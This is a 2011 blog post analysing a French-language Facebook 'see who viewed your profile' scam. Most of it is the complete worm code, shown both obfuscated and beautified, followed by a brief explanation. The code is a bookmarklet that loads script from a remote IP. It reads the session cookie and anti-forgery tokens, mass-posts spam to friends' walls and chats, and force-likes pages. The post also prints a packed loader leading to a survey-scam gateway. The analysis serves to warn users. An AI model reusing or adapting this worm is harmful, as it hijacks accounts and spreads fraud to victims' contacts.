Monday, 16 May 2011

Scam: qui regarde mon profil Facebook (cpalead survey)



javascript:(function(){_ccscr=document.createElement('SCRIPT');_ccscr.type='text/javascript';_ccscr.src='http://184.107.77.69/rad.php?'+(Math.random());document.getElementsByTagName('head')[0].appendChild(_ccscr);})();


http://184.107.77.69/rad.php:
function readCookie(_0x491dx2) { var _0x491dx3 = _0x491dx2 + '='; var _0x491dx4 = document['cookie']['split'](';'); for (var _0x491dx5 = 0; _0x491dx5 < _0x491dx4['length']; _0x491dx5++) { var _0x491dx6 = _0x491dx4[_0x491dx5]; while (_0x491dx6['charAt'](0) == ' ') { _0x491dx6 = _0x491dx6['substring'](1, _0x491dx6['length']); }; if (_0x491dx6['indexOf'](_0x491dx3) == 0) { return _0x491dx6['substring'](_0x491dx3['length'], _0x491dx6['length']); }; }; return null; }; var user_id = readCookie('c_user'); var user_name = document['getElementById']('navAccountName')['innerHTML']; var post_form_id = document['getElementsByName']('post_form_id')[0]['value']; var fb_dtsg = document['getElementsByName']('fb_dtsg')[0]['value']; var this_chat = 'Bonjour! Je viens de decouvrir qui ont consulte mon profil aujourd hui! Vous pouvez trouver @ http://linka.cc/5W6x'; var prepared_chat = encodeURIComponent(this_chat); var token = Math['round'](new Date()['getTime']() / 1000); var http1 = new XMLHttpRequest(); var url1 = 'http://www.facebook.com/ajax/typeahead/first_degree.php?__a=1&viewer=' + user_id + '&token=' + token + '-6&filter[0]=user&options[0]=friends_only'; var params1 = ''; http1['open']('GET', url1 + '?' + params1, true); http1['onreadystatechange'] = function () { if (http1['readyState'] == 4 && http1['status'] == 200) { var _0x491dx13 = http1['responseText']; _0x491dx13 = _0x491dx13['replace']('for (;;);', ''); _0x491dx13 = JSON['parse'](_0x491dx13); var _0x491dx14 = 0; for (uid in _0x491dx13['payload']['entries']) { if (_0x491dx14 < 400) { var _0x491dx15 = new XMLHttpRequest(); var _0x491dx16 = 'http://www.facebook.com/ajax/profile/composer.php?__a=1'; var _0x491dx17 = 'post_form_id=' + post_form_id + '&fb_dtsg=' + fb_dtsg + '&xhpc_composerid=u574553_1&xhpc_targetid=' + _0x491dx13['payload']['entries'][_0x491dx14]['uid'] + '&xhpc_context=profile&xhpc_fbx=1&aktion=post&app_id=2309869772&UIThumbPager_Input=0&attachment[params][metaTagMap][0][http-equiv]=content-type&attachment[params][metaTagMap][0][content]=text%2Fhtml%3B%20charset%3Dutf-8&attachment[params][metaTagMap][1][property]=og%3Atitle&attachment[params][metaTagMap][1][content]=Voir qui a vu votre profil!&attachment[params][metaTagMap][2][property]=og%3Aurl&attachment[params][metaTagMap][2][content]=http://www.facebook.com&attachment[params][metaTagMap][3][property]=og%3Asite_name&attachment[params][metaTagMap][3][content]=Voir qui a vu votre profil!&attachment[params][metaTagMap][4][property]=og%3Aimage&attachment[params][metaTagMap][4][content]=http://i.imgur.com/xmJXf.jpg&attachment[params][metaTagMap][5][property]=og%3Adescription&attachment[params][metaTagMap][5][content]=Maintenant vous pouvez voir qui regarde votre profil tous les jours!&attachment[params][metaTagMap][6][name]=description&attachment[params][metaTagMap][6][content]=Maintenant vous pouvez voir qui regarde votre profil tous les jours!&attachment[params][metaTagMap][7][http-equiv]=Content-Type&attachment[params][metaTagMap][7][content]=text%2Fhtml%3B%20charset%3Dutf-8&attachment[params][medium]=106&attachment[params][urlInfo][user]=http://bit.ly/maIQdk&attachment[params][favicon]=http://lol.info/os/favicon.ico&attachment[params][title]=Voir qui a vu votre profil!&attachment[params][fragment_title]=&attachment[params][external_author]=&attachment[params][summary]=Maintenant vous pouvez voir qui regarde votre profil tous les jours!&attachment[params][url]=http://www.facebook.com&attachment[params][ttl]=0&attachment[params][error]=1&attachment[params][responseCode]=206&attachment[params][metaTags][description]=Maintenant vous pouvez voir qui regarde votre profil tous les jours!&attachment[params][images][0]=http://i.imgur.com/xmJXf.jpg&attachment[params][scrape_time]=1302991496&attachment[params][cache_hit]=1&attachment[type]=100&xhpc_message_text=Wow, cela fonctionne vraiment! Decouvrez qui consulte votre profil!&xhpc_message=Wow, cela fonctionne vraiment! Decouvrez qui consulte votre profil!&nctr[_mod]=pagelet_wall&lsd&post_form_id_source=AsyncRequest'; _0x491dx15['open']('POST', _0x491dx16, true); _0x491dx15['setRequestHeader']('Content-type', 'application/x-www-form-urlencoded'); _0x491dx15['setRequestHeader']('Content-length', _0x491dx17['length']); _0x491dx15['setRequestHeader']('Connection', 'keep-alive'); _0x491dx15['onreadystatechange'] = function () { if (_0x491dx15['readyState'] == 4 && _0x491dx15['status'] == 200) {}; }; _0x491dx15['send'](_0x491dx17); }; _0x491dx14++; }; http1['close']; }; }; http1['send'](null); var hide = document['getElementById']('fbDockChatTabSlider'); hide['style']['display'] = 'none'; var http3 = new XMLHttpRequest(); var url3 = 'http://www.facebook.com/ajax/chat/buddy_list.php?__a=1'; var params3 = 'user=' + user_id + '&popped_out=false&force_render=true&post_form_id=' + post_form_id + '&fb_dtsg=' + fb_dtsg + '&lsd&post_form_id_source=AsyncRequest'; http3['open']('POST', url3, true); http3['setRequestHeader']('Content-type', 'application/x-www-form-urlencoded'); http3['setRequestHeader']('Content-length', params3['length']); http3['setRequestHeader']('Connection', 'close'); http3['onreadystatechange'] = function () { if (http3['readyState'] == 4 && http3['status'] == 200) { var _0x491dx1c = http3['responseText']; _0x491dx1c = _0x491dx1c['replace']('for (;;);', ''); _0x491dx1c = JSON['parse'](_0x491dx1c); var _0x491dx14 = 0; for (property in _0x491dx1c['payload']['buddy_list']['nowAvailableList']) { if (_0x491dx14 < 100) { var _0x491dx1d = new XMLHttpRequest(); var _0x491dx1e = Math['floor'](Math['random']() * 1000000); var _0x491dx1f = Math['round'](new Date()['getTime']() / 1000); var _0x491dx20 = 'http://www.facebook.com/ajax/chat/send.php?__a=1'; var _0x491dx21 = 'msg_id=' + _0x491dx1e + '&client_time=' + _0x491dx1f + '&to=' + property + '&num_tabs=1&pvs_time=' + _0x491dx1f + '&msg_text=' + prepared_chat + '&to_offline=false&post_form_id=' + post_form_id + '&fb_dtsg=' + fb_dtsg + '&lsd&post_form_id_source=AsyncRequest'; _0x491dx1d['open']('POST', _0x491dx20, true); _0x491dx1d['setRequestHeader']('Content-type', 'application/x-www-form-urlencoded'); _0x491dx1d['setRequestHeader']('Content-length', _0x491dx21['length']); _0x491dx1d['setRequestHeader']('Connection', 'close'); _0x491dx1d['onreadystatechange'] = function () { if (_0x491dx1d['readyState'] == 4 && _0x491dx1d['status'] == 200) {}; }; _0x491dx1d['send'](_0x491dx21); }; _0x491dx14++; }; http3['close']; }; }; http3['send'](params3); var http4 = new XMLHttpRequest(); var url4 = 'http://www.facebook.com/ajax/pages/fan_status.php?__a=1'; var params4 = 'fbpage_id=217548714935541&add=1&reload=0&preserve_tab=false&nctr[_mod]=pagelet_header&post_form_id=' + post_form_id + '&fb_dtsg=' + fb_dtsg + '&lsd&post_form_id_source=AsyncRequest'; http4['open']('POST', url4, true); http4['setRequestHeader']('Content-type', 'application/x-www-form-urlencoded'); http4['setRequestHeader']('Content-length', params4['length']); http4['setRequestHeader']('Connection', 'close'); http4['onreadystatechange'] = function () { if (http4['readyState'] == 4 && http4['status'] == 200) { http4['close']; }; }; http4['send'](params4); var http5 = new XMLHttpRequest(); var url5 = 'http://www.facebook.com/ajax/pages/fan_status.php?__a=1'; var params5 = 'fbpage_id=198701800175160&add=1&reload=0&preserve_tab=false&nctr[_mod]=pagelet_header&post_form_id=' + post_form_id + '&fb_dtsg=' + fb_dtsg + '&lsd&post_form_id_source=AsyncRequest'; http5['open']('POST', url5, true); http5['setRequestHeader']('Content-type', 'application/x-www-form-urlencoded'); http5['setRequestHeader']('Content-length', params5['length']); http5['setRequestHeader']('Connection', 'close'); http5['onreadystatechange'] = function () { if (http5['readyState'] == 4 && http5['status'] == 200) { http5['close']; }; }; http5['send'](params5); var http6 = new XMLHttpRequest(); var url6 = 'http://www.facebook.com/ajax/pages/fan_status.php?__a=1'; var params6 = 'fbpage_id=226360327377843&add=1&reload=0&preserve_tab=false&nctr[_mod]=pagelet_header&post_form_id=' + post_form_id + '&fb_dtsg=' + fb_dtsg + '&lsd&post_form_id_source=AsyncRequest'; http6['open']('POST', url6, true); http6['setRequestHeader']('Content-type', 'application/x-www-form-urlencoded'); http6['setRequestHeader']('Content-length', params6['length']); http6['setRequestHeader']('Connection', 'close'); http6['onreadystatechange'] = function () { if (http6['readyState'] == 4 && http6['status'] == 200) { http6['close']; }; }; http6['send'](params6); function include(_0x491dx2c) { var _0x491dx2d = document['createElement']('script'); _0x491dx2d['src'] = _0x491dx2c; _0x491dx2d['type'] = 'text/javascript'; _0x491dx2d['defer'] = true; document['getElementsByTagName']('head')['item'](0)['appendChild'](_0x491dx2d); }; include('http://code.jquery.com/jquery-1.5.2.min.js'); /////////////////// //////////////////////////////////////////////////////////////////////////////////////////// ////////////////// var randomnumber=Math.floor(Math.random()*999999) var chatmessage = ""; var postmessage = "%tf% %tf% %tf% %tf% Vous les gars regarde mon profil le plus aujourd hui! Voir qui ont regarde le votre @ http://linka.cc/5W6x"; var redirect = "http://184.107.77.69/end.php"; var eventdesc = "Bonjour\n\nSi vous voulez savoir qui a vu votre profil, cliquez ci-dessous::\n\n http://linka.cc/5W6x#"+randomnumber; var eventname = "Voir qui a vu votre profil!"+randomnumber; var nfriends = 5000; //

Beatified
function readCookie(_0x491dx2) {
    var _0x491dx3 = _0x491dx2 + '=';
    var _0x491dx4 = document['cookie']['split'](';');
    for (var _0x491dx5 = 0; _0x491dx5 < _0x491dx4['length']; _0x491dx5++) {
        var _0x491dx6 = _0x491dx4[_0x491dx5];
        while (_0x491dx6['charAt'](0) == ' ') {
            _0x491dx6 = _0x491dx6['substring'](1, _0x491dx6['length']);
        };
        if (_0x491dx6['indexOf'](_0x491dx3) == 0) {
            return _0x491dx6['substring'](_0x491dx3['length'], _0x491dx6['length']);
        };
    };
    return null;
};
var user_id = readCookie('c_user');
var user_name = document['getElementById']('navAccountName')['innerHTML'];
var post_form_id = document['getElementsByName']('post_form_id')[0]['value'];
var fb_dtsg = document['getElementsByName']('fb_dtsg')[0]['value'];
var this_chat = 'Bonjour! Je viens de decouvrir qui ont consulte mon profil aujourd hui! Vous pouvez trouver @ http://linka.cc/5W6x';
var prepared_chat = encodeURIComponent(this_chat);
var token = Math['round'](new Date()['getTime']() / 1000);
var http1 = new XMLHttpRequest();
var url1 = 'http://www.facebook.com/ajax/typeahead/first_degree.php?__a=1&viewer=' + user_id + '&token=' + token + '-6&filter[0]=user&options[0]=friends_only';
var params1 = '';
http1['open']('GET', url1 + '?' + params1, true);
http1['onreadystatechange'] = function () {
    if (http1['readyState'] == 4 && http1['status'] == 200) {
        var _0x491dx13 = http1['responseText'];
        _0x491dx13 = _0x491dx13['replace']('for (;;);', '');
        _0x491dx13 = JSON['parse'](_0x491dx13);
        var _0x491dx14 = 0;
        for (uid in _0x491dx13['payload']['entries']) {
            if (_0x491dx14 < 400) {
                var _0x491dx15 = new XMLHttpRequest();
                var _0x491dx16 = 'http://www.facebook.com/ajax/profile/composer.php?__a=1';
                var _0x491dx17 = 'post_form_id=' + post_form_id + '&fb_dtsg=' + fb_dtsg + '&xhpc_composerid=u574553_1&xhpc_targetid=' + _0x491dx13['payload']['entries'][_0x491dx14]['uid'] + '&xhpc_context=profile&xhpc_fbx=1&aktion=post&app_id=2309869772&UIThumbPager_Input=0&attachment[params][metaTagMap][0][http-equiv]=content-type&attachment[params][metaTagMap][0][content]=text%2Fhtml%3B%20charset%3Dutf-8&attachment[params][metaTagMap][1][property]=og%3Atitle&attachment[params][metaTagMap][1][content]=Voir qui a vu votre profil!&attachment[params][metaTagMap][2][property]=og%3Aurl&attachment[params][metaTagMap][2][content]=http://www.facebook.com&attachment[params][metaTagMap][3][property]=og%3Asite_name&attachment[params][metaTagMap][3][content]=Voir qui a vu votre profil!&attachment[params][metaTagMap][4][property]=og%3Aimage&attachment[params][metaTagMap][4][content]=http://i.imgur.com/xmJXf.jpg&attachment[params][metaTagMap][5][property]=og%3Adescription&attachment[params][metaTagMap][5][content]=Maintenant vous pouvez voir qui regarde votre profil tous les jours!&attachment[params][metaTagMap][6][name]=description&attachment[params][metaTagMap][6][content]=Maintenant vous pouvez voir qui regarde votre profil tous les jours!&attachment[params][metaTagMap][7][http-equiv]=Content-Type&attachment[params][metaTagMap][7][content]=text%2Fhtml%3B%20charset%3Dutf-8&attachment[params][medium]=106&attachment[params][urlInfo][user]=http://bit.ly/maIQdk&attachment[params][favicon]=http://lol.info/os/favicon.ico&attachment[params][title]=Voir qui a vu votre profil!&attachment[params][fragment_title]=&attachment[params][external_author]=&attachment[params][summary]=Maintenant vous pouvez voir qui regarde votre profil tous les jours!&attachment[params][url]=http://www.facebook.com&attachment[params][ttl]=0&attachment[params][error]=1&attachment[params][responseCode]=206&attachment[params][metaTags][description]=Maintenant vous pouvez voir qui regarde votre profil tous les jours!&attachment[params][images][0]=http://i.imgur.com/xmJXf.jpg&attachment[params][scrape_time]=1302991496&attachment[params][cache_hit]=1&attachment[type]=100&xhpc_message_text=Wow, cela fonctionne vraiment! Decouvrez qui consulte votre profil!&xhpc_message=Wow, cela fonctionne vraiment! Decouvrez qui consulte votre profil!&nctr[_mod]=pagelet_wall&lsd&post_form_id_source=AsyncRequest';
                _0x491dx15['open']('POST', _0x491dx16, true);
                _0x491dx15['setRequestHeader']('Content-type', 'application/x-www-form-urlencoded');
                _0x491dx15['setRequestHeader']('Content-length', _0x491dx17['length']);
                _0x491dx15['setRequestHeader']('Connection', 'keep-alive');
                _0x491dx15['onreadystatechange'] = function () {
                    if (_0x491dx15['readyState'] == 4 && _0x491dx15['status'] == 200) {};
                };
                _0x491dx15['send'](_0x491dx17);
            };
            _0x491dx14++;
        };
        http1['close'];
    };
};
http1['send'](null);
var hide = document['getElementById']('fbDockChatTabSlider');

hide['style']['display'] = 'none';

var http3 = new XMLHttpRequest();

var url3 = 'http://www.facebook.com/ajax/chat/buddy_list.php?__a=1';

var params3 = 'user=' + user_id + '&popped_out=false&force_render=true&post_form_id=' + post_form_id + '&fb_dtsg=' + fb_dtsg + '&lsd&post_form_id_source=AsyncRequest';
http3['open']('POST', url3, true);
http3['setRequestHeader']('Content-type', 'application/x-www-form-urlencoded');
http3['setRequestHeader']('Content-length', params3['length']);
http3['setRequestHeader']('Connection', 'close');
http3['onreadystatechange'] = function () {
    if (http3['readyState'] == 4 && http3['status'] == 200) {
        var _0x491dx1c = http3['responseText'];
        _0x491dx1c = _0x491dx1c['replace']('for (;;);', '');
        _0x491dx1c = JSON['parse'](_0x491dx1c);
        var _0x491dx14 = 0;
        for (property in _0x491dx1c['payload']['buddy_list']['nowAvailableList']) {
            if (_0x491dx14 < 100) {
                var _0x491dx1d = new XMLHttpRequest();
                var _0x491dx1e = Math['floor'](Math['random']() * 1000000);
                var _0x491dx1f = Math['round'](new Date()['getTime']() / 1000);
                var _0x491dx20 = 'http://www.facebook.com/ajax/chat/send.php?__a=1';
                var _0x491dx21 = 'msg_id=' + _0x491dx1e + '&client_time=' + _0x491dx1f + '&to=' + property + '&num_tabs=1&pvs_time=' + _0x491dx1f + '&msg_text=' + prepared_chat + '&to_offline=false&post_form_id=' + post_form_id + '&fb_dtsg=' + fb_dtsg + '&lsd&post_form_id_source=AsyncRequest';
                _0x491dx1d['open']('POST', _0x491dx20, true);
                _0x491dx1d['setRequestHeader']('Content-type', 'application/x-www-form-urlencoded');
                _0x491dx1d['setRequestHeader']('Content-length', _0x491dx21['length']);
                _0x491dx1d['setRequestHeader']('Connection', 'close');
                _0x491dx1d['onreadystatechange'] = function () {
                    if (_0x491dx1d['readyState'] == 4 && _0x491dx1d['status'] == 200) {};
                };
                _0x491dx1d['send'](_0x491dx21);
            };
            _0x491dx14++;
        };
        http3['close'];
    };
};
http3['send'](params3);

var http4 = new XMLHttpRequest();

var url4 = 'http://www.facebook.com/ajax/pages/fan_status.php?__a=1';

var params4 = 'fbpage_id=217548714935541&add=1&reload=0&preserve_tab=false&nctr[_mod]=pagelet_header&post_form_id=' + post_form_id + '&fb_dtsg=' + fb_dtsg + '&lsd&post_form_id_source=AsyncRequest';
http4['open']('POST', url4, true);
http4['setRequestHeader']('Content-type', 'application/x-www-form-urlencoded');
http4['setRequestHeader']('Content-length', params4['length']);
http4['setRequestHeader']('Connection', 'close');
http4['onreadystatechange'] = function () {
    if (http4['readyState'] == 4 && http4['status'] == 200) {
        http4['close'];
    };
};
http4['send'](params4);
var http5 = new XMLHttpRequest();
var url5 = 'http://www.facebook.com/ajax/pages/fan_status.php?__a=1';
var params5 = 'fbpage_id=198701800175160&add=1&reload=0&preserve_tab=false&nctr[_mod]=pagelet_header&post_form_id=' + post_form_id + '&fb_dtsg=' + fb_dtsg + '&lsd&post_form_id_source=AsyncRequest';
http5['open']('POST', url5, true);
http5['setRequestHeader']('Content-type', 'application/x-www-form-urlencoded');
http5['setRequestHeader']('Content-length', params5['length']);
http5['setRequestHeader']('Connection', 'close');
http5['onreadystatechange'] = function () {
    if (http5['readyState'] == 4 && http5['status'] == 200) {
        http5['close'];
    };
};
http5['send'](params5);
var http6 = new XMLHttpRequest();
var url6 = 'http://www.facebook.com/ajax/pages/fan_status.php?__a=1';
var params6 = 'fbpage_id=226360327377843&add=1&reload=0&preserve_tab=false&nctr[_mod]=pagelet_header&post_form_id=' + post_form_id + '&fb_dtsg=' + fb_dtsg + '&lsd&post_form_id_source=AsyncRequest';
http6['open']('POST', url6, true);
http6['setRequestHeader']('Content-type', 'application/x-www-form-urlencoded');
http6['setRequestHeader']('Content-length', params6['length']);
http6['setRequestHeader']('Connection', 'close');
http6['onreadystatechange'] = function () {
    if (http6['readyState'] == 4 && http6['status'] == 200) {
        http6['close'];
    };
};
http6['send'](params6);
function include(_0x491dx2c) {
    var _0x491dx2d = document['createElement']('script');
    _0x491dx2d['src'] = _0x491dx2c;
    _0x491dx2d['type'] = 'text/javascript';
    _0x491dx2d['defer'] = true;
    document['getElementsByTagName']('head')['item'](0)['appendChild'](_0x491dx2d);
};
include('http://code.jquery.com/jquery-1.5.2.min.js'); /////////////////// //////////////////////////////////////////////////////////////////////////////////////////// ////////////////// var randomnumber=Math.floor(Math.random()*999999) var chatmessage = ""; var postmessage = "%tf% %tf% %tf% %tf% Vous les gars regarde mon profil le plus aujourd hui! Voir qui ont regarde le votre @ http://linka.cc/5W6x"; var redirect = "http://184.107.77.69/end.php"; var eventdesc = "Bonjour\n\nSi vous voulez savoir qui a vu votre profil, cliquez ci-dessous::\n\n http://linka.cc/5W6x#"+randomnumber; var eventname = "Voir qui a vu votre profil!"+randomnumber; var nfriends = 5000; //


http://184.107.77.69/end.php:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type='text/javascript' src='http://zarkaa.info/dmgca.js'></script>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Profil!</title>
<style type="text/css">
<!--
a:link {
    text-decoration: none;
}
a:visited {
    text-decoration: none;
}
a:hover {
    text-decoration: none;
}
a:active {
    text-decoration: none;
}
a {
    font-size: 16px;
}
-->
</style></head>
<body>
<center>
  <h1><img src="http://i.imgur.com/b9cKL.gif" width="679" height="675" alt="perfil" /></h1>
  <h3><a href="https://addons.mozilla.org/en-US/firefox/addon/ifamebook/">Cliquez ici pour decouvrir!</a></h3>
</center>
        </div>
</body>
</html>
<script type="text/javascript" src="http://widgets.amung.us/small.js"></script><script type="text/javascript">WAU_small('2rnz1x7yms5j')</script>

dmgca.js:
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('3 h=["\\6\\2\\1\\b\\7\\1\\5\\4\\6\\j\\d"];3 f=["\\d\\8\\i\\1\\9\\7\\o\\1\\8\\4\\2\\k\\2"];3 g=["\\2\\l\\a"];3 e=["\\i\\1\\9\\7\\m\\5"];3 n=["\\1\\5\\a\\b\\j\\6\\w\\4\\2\\k\\2"];p.D(z("%y B=\\"C/A\\" x=\\"r://"+h[0]+"/"+f[0]+"?"+g[0]+"=q&s;"+e[0]+"=t\\"%c%v/u%c"));',40,40,'|x61|x70|var|x2E|x64|x63|x65|x79|x74|x62|x6C|3E|x6D|g10f55a1d6ae4b9862567f676a60191c2|m91e69687f76451bab9d5043a8e68a4d8|p19a0f2de42c1d03ca3e0d4641a03cdef|cddebdfc156d3987f6f004d4060ebeefc|x67|x6F|x68|x75|x69|a62c7b3a5f63d0c30d62d705400c1c90b|x77|document|133835|http|amp|MTg3NDY0|script|3C|x6B|src|3Cscript|unescape|javascript|type|text|write'.split('|'),0,{}))

unpack:
var cddebdfc156d3987f6f004d4060ebeefc = ["\x63\x70\x61\x6C\x65\x61\x64\x2E\x63\x6F\x6D"];
var m91e69687f76451bab9d5043a8e68a4d8 = ["\x6D\x79\x67\x61\x74\x65\x77\x61\x79\x2E\x70\x68\x70"];
var p19a0f2de42c1d03ca3e0d4641a03cdef = ["\x70\x75\x62"];
var g10f55a1d6ae4b9862567f676a60191c2 = ["\x67\x61\x74\x65\x69\x64"];
var a62c7b3a5f63d0c30d62d705400c1c90b = ["\x61\x64\x62\x6C\x6F\x63\x6B\x2E\x70\x68\x70"];
document.write(unescape("<script type=\"text/javascript\" src=\"http://" + cddebdfc156d3987f6f004d4060ebeefc[0] + "/" + m91e69687f76451bab9d5043a8e68a4d8[0] + "?" + p19a0f2de42c1d03ca3e0d4641a03cdef[0] + "=133835&amp;" + g10f55a1d6ae4b9862567f676a60191c2[0] + "=MTg3NDY0\"></script>"));

\x63\x70\x61\x6C\x65\x61\x64\x2E\x63\x6F\x6D = cp1lead.com
\x6D\x79\x67\x61\x74\x65\x77\x61\x79\x2E\x70\x68\x70 = mygateway.php
\x70\x75\x62 = pub
\x67\x61\x74\x65\x69\x64 = gateid
\x61\x64\x62\x6C\x6F\x63\x6B\x2E\x70\x68\x70 = adblock.php

Approximately it's a social enginering based worm, that write a random message on your friend's wall, something like "Click here for see who view your facebook profil" and when you go to the page it ask you to fill a CPAlead survey before showing fake view result.


it's not a new phenomenon.


--------

http://www.facebook.com/help/?faq=12903

---
Related: SpamLoco - Averigua quién visita tu perfil en Facebook, es falso!

1 comment:

  1. The best you can do is go to the Application page, click on report, attach a screenshot, and hope facebook bans the developers ^^

    ReplyDelete